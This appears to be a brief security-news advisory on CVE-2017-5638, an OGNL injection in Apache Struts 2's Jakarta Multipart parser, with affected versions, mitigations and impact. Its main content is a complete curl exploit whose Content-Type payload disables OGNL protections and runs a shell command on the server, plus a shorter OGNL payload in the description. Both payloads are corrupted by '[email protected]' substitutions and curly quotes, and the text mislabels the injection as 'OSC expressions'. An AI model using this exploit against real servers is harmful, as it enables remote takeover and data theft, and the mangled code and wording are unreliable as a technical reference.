Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

Listen to this Post

How the mentioned CVE works

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit mechanism involves a malicious `Content-Type` HTTP header. When a request with a file upload is sent to a Struts2 endpoint, the framework incorrectly processes the `Content-Type` value. An attacker can craft this header to inject Operating System Command (OSC) expressions. Specifically, by inserting a malicious OGNL expression within the `Content-Type` header, for example, %{_memberAccess['allowStaticMethodAccess']=true,[email protected]@getResponse().getWriter(),res.println('hacked'),res.close()}, the parser evaluates this expression due to improper exception handling during file upload. This flawed error management in the `FileUploadInterceptor` component allows the OGNL code to be executed on the server side with the application’s privileges, leading to remote code execution without any authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/upload.action`

How Exploit:

Craft malicious Content-Type header.

Target vulnerable Struts2 file upload.

OGNL expression injection.

Server-side command execution.

Protection from this CVE

Upgrade to Struts 2.3.32 or 2.5.10.1.

Apply official security patch.

Use alternative multipart parser.

Implement WAF rules.

Impact:

Full server compromise.

Data theft.

Arbitrary command execution.

Complete system access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top